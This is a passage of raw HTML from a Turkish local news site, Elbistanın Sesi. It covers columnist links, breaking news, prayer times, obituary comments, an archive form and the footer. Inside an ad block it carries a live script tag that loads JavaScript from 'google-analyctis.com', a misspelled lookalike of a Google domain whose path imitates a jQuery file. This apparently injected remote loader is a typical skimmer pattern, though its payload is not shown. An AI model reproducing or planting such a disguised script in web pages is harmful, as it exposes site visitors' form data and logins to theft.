              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/90/prof-dr-mustafa-necati-dagli" title="Prof. Dr. Mustafa Necati Daglı">Prof. Dr. Mustafa Necati Daglı</a></h4>
              <a href="http://www.elbistaninsesi.com/ol-san-zen-makale,6198.html" title="Ol San zen" >Ol San zen</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/benzer-kaderin-yolculari-filistin-ve-dogu-turkistan-makale,6196.html" title="Benzer kaderin yolcuları: Filistin ve Doğu Türkistan" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/dr-mustafa-kok_1.jpg" alt="Dr. Mustafa KÖK">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/8/dr-mustafa-kok" title="Dr. Mustafa KÖK">Dr. Mustafa KÖK</a></h4>
              <a href="http://www.elbistaninsesi.com/benzer-kaderin-yolculari-filistin-ve-dogu-turkistan-makale,6196.html" title="Benzer kaderin yolcuları: Filistin ve Doğu Türkistan" >Benzer kaderin yolcuları: Filistin ve Doğu Türkistan</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/kahrolacaksa-yikilacaksa-yok-olacaksa-makale,6195.html" title="Kahrolacaksa, Yıkılacaksa, Yok Olacaksa" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mikail_Yahin_foto.jpeg" alt="Mikail Şahin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/65/mikail-sahin" title="Mikail Şahin">Mikail Şahin</a></h4>
              <a href="http://www.elbistaninsesi.com/kahrolacaksa-yikilacaksa-yok-olacaksa-makale,6195.html" title="Kahrolacaksa, Yıkılacaksa, Yok Olacaksa" >Kahrolacaksa, Yıkılacaksa, Yok Olacaksa</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/mahsuni-baba-makale,6193.html" title="Mahsuni Baba" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/ceritli.jpg" alt="Celal Ceritli">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/95/celal-ceritli" title="Celal Ceritli">Celal Ceritli</a></h4>
              <a href="http://www.elbistaninsesi.com/mahsuni-baba-makale,6193.html" title="Mahsuni Baba" >Mahsuni Baba</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/neler-oloji-makale,6187.html" title="NELER OLOJİ " >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Can-Ugur_919_1.jpg" alt="Can Uğur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/17/can-ugur" title="Can Uğur">Can Uğur</a></h4>
              <a href="http://www.elbistaninsesi.com/neler-oloji-makale,6187.html" title="NELER OLOJİ " >NELER OLOJİ </a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/zimem-defteri-makale,6184.html" title="Zimem Defteri" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/kitap1.jpg" alt="Sevda Küçük">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/62/sevda-kucuk" title="Sevda Küçük">Sevda Küçük</a></h4>
              <a href="http://www.elbistaninsesi.com/zimem-defteri-makale,6184.html" title="Zimem Defteri" >Zimem Defteri</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/sevgisiz-toplum-makale,6169.html" title="Sevgisiz Toplum" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/fatma_gul.jpg" alt="Fatma Gül- Psikolog">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/79/fatma-gul-psikolog" title="Fatma Gül- Psikolog">Fatma Gül- Psikolog</a></h4>
              <a href="http://www.elbistaninsesi.com/sevgisiz-toplum-makale,6169.html" title="Sevgisiz Toplum" >Sevgisiz Toplum</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/birlesin-ey-turk-lemi-birlesin-makale,6166.html" title="BİRLEŞİN EY TÜRK ÂLEMİ BİRLEŞİN" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Nadir-Adbay_499_1.jpg" alt="Mehmet Ayaz">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/6/mehmet-ayaz" title="Mehmet Ayaz">Mehmet Ayaz</a></h4>
              <a href="http://www.elbistaninsesi.com/birlesin-ey-turk-lemi-birlesin-makale,6166.html" title="BİRLEŞİN EY TÜRK ÂLEMİ BİRLEŞİN" >BİRLEŞİN EY TÜRK ÂLEMİ BİRLEŞİN</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/muhur-ve-elbistanda-kullanimi-makale,6160.html" title="   Mühür ve Elbistan’da Kullanımı" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/034421b8-4158-4551-83a7-c308f4156fe9.jpg" alt="Orhan SAYDAM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/89/orhan-saydam" title="Orhan SAYDAM">Orhan SAYDAM</a></h4>
              <a href="http://www.elbistaninsesi.com/muhur-ve-elbistanda-kullanimi-makale,6160.html" title="   Mühür ve Elbistan’da Kullanımı" >   Mühür ve Elbistan’da Kullanımı</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/yagmur-icin-allah-a-yalvaris-makale,6159.html" title="YAĞMUR İÇİN ALLAH&#039;A YALVARIŞ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gocer_1.jpg" alt="Mehmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/4/mehmet-gocer" title="Mehmet Göçer">Mehmet Göçer</a></h4>
              <a href="http://www.elbistaninsesi.com/yagmur-icin-allah-a-yalvaris-makale,6159.html" title="YAĞMUR İÇİN ALLAH&#039;A YALVARIŞ" >YAĞMUR İÇİN ALLAH&#039;A YALVARIŞ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/zamanimizin-evliligi-makale,6139.html" title="Zamanımızın evliliği" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Yair_arYkan.jpg" alt="Şahin ARIKAN">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/78/sahin-arikan" title="Şahin ARIKAN">Şahin ARIKAN</a></h4>
              <a href="http://www.elbistaninsesi.com/zamanimizin-evliligi-makale,6139.html" title="Zamanımızın evliliği" >Zamanımızın evliliği</a>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>

  
  <!-- SON DAKIKA VE OZEL HABER -->
  <div class="sonozeltab">

    <ul class="nav nav-tabs" id="sonozel">
      <li class="active"><a href="#sondakika" data-toggle="tab" class="sondakika">Son Dakika</a></li>      <li class=""><a href="#ozelhaber" data-toggle="tab" class="ozelhaber">Özel Haber</a></li>    </ul>

    <div class="tab-content">

            <div class="tab-pane active" id="sondakika">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.elbistaninsesi.com/guncel/tuvturkten-gecikme-zammi-aciklamasi-h70291.html" title="TÜVTÜRK’ten gecikme zammı açıklaması" >TÜVTÜRK’ten gecikme zammı açıklaması</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/mikrokredi-18yil-donumunu-kutluyor-h70268.html" title="Mikrokredi, 18.yıl dönümünü kutluyor" >Mikrokredi, 18.yıl dönümünü kutluyor</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/kahramanmaras-valiligi-artan-vakalara-karsi-uyardi-h69744.html" title="Kahramanmaraş Valiliği artan vakalara karşı uyardı" >Kahramanmaraş Valiliği artan vakalara karşı uyardı</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/kiz-cocuguna-cinsel-istismar-iddiasinda-7-supheli-tutuklandi-h69718.html" title="Kız çocuğuna cinsel istismar iddiasında 7 şüpheli tutuklandı" ><b>Kız çocuğuna cinsel istismar iddiasında 7 şüpheli tutuklandı</b></a></li>
          
          <li class="last"><a href="http://www.elbistaninsesi.com/guncel/dusen-helikopterde-afsinli-asker-sehit-oldu-h69425.html" title="Düşen helikopterde Afşinli asker şehit oldu" >Düşen helikopterde Afşinli asker şehit oldu</a></li>
                  </ul>
      </div>
      
            <div class="tab-pane" id="ozelhaber">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEMin görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/vefatlar/durmus-ali-yavuz-80-yasinda-h37225.html" title="Durmuş Ali Yavuz 80 yaşında" >Durmuş Ali Yavuz 80 yaşında</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html" title="Pancardaki polar oranı, mahkemelik oldu" >Pancardaki polar oranı, mahkemelik oldu</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/boyle-saka-gorulmedi-h34847.html" title="Böyle şaka görülmedi!" >Böyle şaka görülmedi!</a></li>
          
          <li class="last"><a href="http://www.elbistaninsesi.com/guncel/eshab-i-kehf-kulliyesine-konaklama-tesisi-h34004.html" title="Eshab-ı Kehf Külliyesine konaklama tesisi" >Eshab-ı Kehf Külliyesi’ne konaklama tesisi</a></li>
                  </ul>
      </div>
      
    </div>
  </div>
  
<!-- NAMAZ VAKITLERI -->
  <div class="namazvakitleri">
    <div class="title">
      <h5>Namaz Vakitleri</h5>
      <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right">
                <option value="adana" >Adana</option>
                <option value="adiyaman" >Adıyaman</option>
                <option value="afyon" >Afyon</option>
                <option value="agri" >Ağrı</option>
                <option value="aksaray" >Aksaray</option>
                <option value="amasya" >Amasya</option>
                <option value="ankara" >Ankara</option>
                <option value="antalya" >Antalya</option>
                <option value="ardahan" >Ardahan</option>
                <option value="artvin" >Artvin</option>
                <option value="aydin" >Aydın</option>
                <option value="balikesir" >Balıkesir</option>
                <option value="bartin" >Bartın</option>
                <option value="batman" >Batman</option>
                <option value="bayburt" >Bayburt</option>
                <option value="bilecik" >Bilecik</option>
                <option value="bingol" >Bingöl</option>
                <option value="bitlis" >Bitlis</option>
                <option value="bolu" >Bolu</option>
                <option value="burdur" >Burdur</option>
                <option value="bursa" >Bursa</option>
                <option value="canakkale" >Çanakkale</option>
                <option value="cankiri" >Çankırı</option>
                <option value="corum" >Çorum</option>
                <option value="denizli" >Denizli</option>
                <option value="diyarbakir" >Diyarbakır</option>
                <option value="duzce" >Düzce</option>
                <option value="edirne" >Edirne</option>
                <option value="elazig" >Elazığ</option>
                <option value="erzincan" >Erzincan</option>
                <option value="erzurum" >Erzurum</option>
                <option value="eskisehir" >Eskişehir</option>
                <option value="gaziantep" >Gaziantep</option>
                <option value="giresun" >Giresun</option>
                <option value="gumushane" >Gümüşhane</option>
                <option value="hakkari" >Hakkari</option>
                <option value="hatay" >Hatay</option>
                <option value="igdir" >Iğdır</option>
                <option value="isparta" >Isparta</option>
                <option value="istanbul" >İstanbul</option>
                <option value="izmir" >İzmir</option>
                <option value="kahramanmaras" selected>Kahramanmaraş</option>
                <option value="karabuk" >Karabük</option>
                <option value="karaman" >Karaman</option>
                <option value="kars" >Kars</option>
                <option value="kastamonu" >Kastamonu</option>
                <option value="kayseri" >Kayseri</option>
                <option value="kirikkale" >Kırıkkale</option>
                <option value="kirklareli" >Kırklareli</option>
                <option value="kirsehir" >Kırşehir</option>
                <option value="kilis" >Kilis</option>
                <option value="izmit" >Kocaeli</option>
                <option value="konya" >Konya</option>
                <option value="kutahya" >Kütahya</option>
                <option value="malatya" >Malatya</option>
                <option value="manisa" >Manisa</option>
                <option value="mardin" >Mardin</option>
                <option value="mersin" >Mersin</option>
                <option value="mugla" >Muğla</option>
                <option value="mus" >Muş</option>
                <option value="nevsehir" >Nevşehir</option>
                <option value="nigde" >Niğde</option>
                <option value="ordu" >Ordu</option>
                <option value="osmaniye" >Osmaniye</option>
                <option value="rize" >Rize</option>
                <option value="adapazari" >Sakarya</option>
                <option value="samsun" >Samsun</option>
                <option value="siirt" >Siirt</option>
                <option value="sinop" >Sinop</option>
                <option value="sivas" >Sivas</option>
                <option value="sanliurfa" >Şanlıurfa</option>
                <option value="sirnak" >Şırnak</option>
                <option value="tekirdag" >Tekirdağ</option>
                <option value="tokat" >Tokat</option>
                <option value="trabzon" >Trabzon</option>
                <option value="tunceli" >Tunceli</option>
                <option value="usak" >Uşak</option>
                <option value="van" >Van</option>
                <option value="yalova" >Yalova</option>
                <option value="yozgat" >Yozgat</option>
                <option value="zonguldak" >Zonguldak</option>
              </select>
    </div>
      <div class="sonuc">

      <table cellspacing="0" cellpadding="0" id="vakitler">
          <tr>
            <th>İmsak</th>
            <th>Güneş</th>
            <th>Öğle</th>
            <th>İkindi</th>
            <th>Akşam</th>
            <th>Yatsı</th>
          </tr>
          <tr>
            <td>03:16</td>
            <td>05:03</td>
            <td>12:38</td>
            <td>16:30</td>
            <td>20:02</td>
            <td>21:42</td>
          </tr>
      </table>


      </div>

  </div>

  <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div>
  <!-- SON YORUMLAR -->
  <div class="son-yorumlar">
    <div class="header">
      <h5>Son Yorumlar</h5>
    </div>
    <div class="content">
      <ul class="unstyled hs-liste add-last">
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayse-yildiz-52-yasinda-h70315.html#comment_351243" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-yildiz-72-yasinda-h70327.html#comment_351242" title="" >Allah Gani Gani rahmet eylesin ,Mekanı...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/seref-tas-40-yasinda-h70328.html#comment_351241" title="" >ALLAH RAHMET EYLESİN BAŞINIZ SAĞOLSUN</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-hayri-corcu-2-h70330.html#comment_351240" title="" >ALLAH RAHMET EYLESİN</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-yildiz-72-yasinda-h70327.html#comment_351238" title="" >Allah rahmet etsin , tüm yakınları ve...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/nazife-yandim-h70318.html#comment_351237" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-hayri-corcu-2-h70330.html#comment_351235" title="" >Allah mekanını cennet eylesin inşAllah</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/pasa-tas-79-yasinda-h70317.html#comment_351233" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-dogan-74-yasinda-h70243.html#comment_351232" title="" >ALLAH Rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/seref-tas-40-yasinda-h70328.html#comment_351231" title="" >ALLAH Rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/seref-tas-40-yasinda-h70328.html#comment_351225" title="" ></a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-hayri-corcu-2-h70330.html#comment_351224" title="" >Nurlar içinde yat,güzel dostum.</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-yildiz-72-yasinda-h70327.html#comment_351223" title="" >ALLA rahmet etsin tüm aileneze baş sağlığı...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/seref-tas-40-yasinda-h70328.html#comment_351222" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-hayri-corcu-2-h70330.html#comment_351221" title="" >Merhuma Allah’tan rahmet; yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-nazile-unsal-h70331.html#comment_351220" title="" >Merhumeye Allah’tan rahmet; yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-nazile-unsal-h70331.html#comment_351219" title="" >Allah rahmet eylesin.</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/cevdet-yavuz-55-yasinda-h70293.html#comment_351217" title="" >Merhuma Allah rahmet eyleye. Yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/seref-tas-40-yasinda-h70328.html#comment_351216" title="" >Allah rahmet eylesin,mekanını cennet eylesin,tüm...</a></li>
                <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-hayri-corcu-2-h70330.html#comment_351215" title="" >Allah. Rahmet. Eylesin mekanı. Cennet....</a></li>
              </ul>
    </div>
  </div>

  
  <!-- EGAZETE -->
  <div class="egazete">
    <div class="header">
      <h5>E-Gazete</h5>
    </div>
    <div class="content">
            <a href="http://www.elbistaninsesi.com/images/sayfalar/7-Haziran-2021.jpg" title="Elbistanın Sesi - 07.06.2021 Manşeti" target="_blank"><img src="http://www.elbistaninsesi.com/images/sayfalar/thumb_7-Haziran-2021.jpg" alt="Elbistanın Sesi - 07.06.2021 Manşeti" /></a>
           </div>
  </div>

  
<!-- ARSIV -->
<div class="arsiv">
  <div class="header">
    <h5>Arşiv</h5>
  </div>
  <div class="content">
    <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" >
      <select name="gun" class="day span1">
                <option value="01" >01</option>
                <option value="02" >02</option>
                <option value="03" >03</option>
                <option value="04" >04</option>
                <option value="05" >05</option>
                <option value="06" >06</option>
                <option value="07" >07</option>
                <option value="08" >08</option>
                <option value="09" >09</option>
                <option value="10" >10</option>
                <option value="11" >11</option>
                <option value="12" >12</option>
                <option value="13" >13</option>
                <option value="14" >14</option>
                <option value="15" >15</option>
                <option value="16" selected>16</option>
                <option value="17" >17</option>
                <option value="18" >18</option>
                <option value="19" >19</option>
                <option value="20" >20</option>
                <option value="21" >21</option>
                <option value="22" >22</option>
                <option value="23" >23</option>
                <option value="24" >24</option>
                <option value="25" >25</option>
                <option value="26" >26</option>
                <option value="27" >27</option>
                <option value="28" >28</option>
                <option value="29" >29</option>
                <option value="30" >30</option>
                <option value="31" >31</option>
              </select>
      <select name="ay" class="month span1">
                <option value="01" >Ocak</option>
                <option value="02" >Şubat</option>
                <option value="03" >Mart</option>
                <option value="04" >Nisan</option>
                <option value="05" >Mayıs</option>
                <option value="06" selected>Haziran</option>
                <option value="07" >Temmuz</option>
                <option value="08" >Ağustos</option>
                <option value="09" >Eylül</option>
                <option value="10" >Ekim</option>
                <option value="11" >Kasım</option>
                <option value="12" >Aralık</option>
              </select>
      <select name="yil" class="year span1">
                <option value="2021" selected>2021</option>
                <option value="2020" >2020</option>
                <option value="2019" >2019</option>
                <option value="2018" >2018</option>
                <option value="2017" >2017</option>
              </select>
      <button type="submit" class="btn btn-default span1 pull-right">Ara</button>
    </form>
  </div>
</div>


  


        </div>
        
      </div>

        
                <!-- Sol Dikey Reklam -->
        <div class="reklam dikey sol" style="width:px;height:px;">

                                                                                                                                                                            </div>
        
        <!-- Sağ Dikey Reklam -->
        <div class="reklam dikey sag ortala" style="width:px;height:px;">

                                                                <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kaynarca -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-3633419220222736"
 data-ad-slot="5807534991"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
 (adsbygoogle = window.adsbygoogle || []).push({});
</script></p>
              
                                                                                                                                                                                                      </div>

        
      </div>

      <!-- FOOTER -->
<div id="siteFooter" class="footer">

      <div class="row-fluid">
      <div class="container center">
        <div class="span4">
          <div>Copyright © 2021 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div>
          <div class="footer-social">
            <a href="https://facebook.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a>
            <a href="https://twitter.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a>
            <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a>
          </div>
        </div>
        <div class="span4 text-center">
          <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Vefat - Teşekkür / Nazile ÜNSAL" /></a></div>
        </div>
        <div class="span4">
          <p>&lt;center&gt;

0 (344) 415 04 15 &lt;br&gt;
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="badfd6d8d3c9cedbd4d3d4c9dfc9d3dddbc0dfcedfc9d3faddd7dbd3d694d9d5d7">[email&#160;protected]</a>
&lt;br&gt;Kızılcaoba Mah. Kışla Cad. 19/1&lt;/center&gt;

    </p>          <p><span class="site-info glyphicons earphone" style="padding-left: 0;"></span> 0 (344) 415 04 15</p>        </div>
      </div>
      </div>

      <div id="footer-alt" class="row-fluid">

        <div class="container center">

        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div>
        </div>

        </div>
      </div>



      <div class="row-fluid">
      <div class="container center">
        <div class="span12 text-center">
          <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p>         <a href="https://www.tebilisim.com/" target="_blank" title="haber sistemi, haber scripti, haber yazılımı, tebilişim"><p>Yazılım: TE Bilişim</p></a> 
        </div>
      </div>
      </div>

  <div id="top" class="btn btn-inverse">Yukarı Çık</div>
</div>
      <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
if (location.href.match(/\?.*/) && document.referrer) {
   location.href = location.href.replace(/\?.*/, '');
}
</script>
<div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&amp;rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fvefatlar%2Fvefat-tesekkur-nazile-unsal-h70331.html" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı Adı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı Adı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn hs-sdch btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a>
    <button class="btn hs-sdch btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>




<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/hs-paylas.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/text.js"></script>
<script type="text/javascript">

	new UISearch( document.getElementById( 'sb-search' ) );

	$(function(){
							});

		$("#comment_list .text").pKisalt();
	
		var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML,
	gsSpace   = ' ',
	gsUrl   = location.href;
	$("#paylas").jsSocials({
		url: location.href,
		text: gsTitle,
		showCount: true,
		showLabel: false,
		shares: [
			{ share: "twitter", via: "elbistaninsesi", hashtags: "Elbistanın Sesi" },
            { share: "whatsapp", text: "Bunu bilmelisin!"},
            "facebook",
            "linkedin",
            "pinterest",
			]
		});
							$('#haber > .page-header').waypoint(function(direction) {
		  $('#article-finished').toggleClass('hiding', direction === "up");
		}, {
		  offset: function() {
		    return $.waypoints('viewportHeight') - $(this).height() - 750;
		  }
		});
			var hasBeenClicked = false;
	var kisa_site_adi = "Elbistanın Sesi";
	var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com";

	$(document).on('copy', function(e){
		if ($(e.target).closest("#yorumlar,textarea,input").length) {
			hasBeenClicked = true;
		} else {
			hasBeenClicked = false;
		}
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
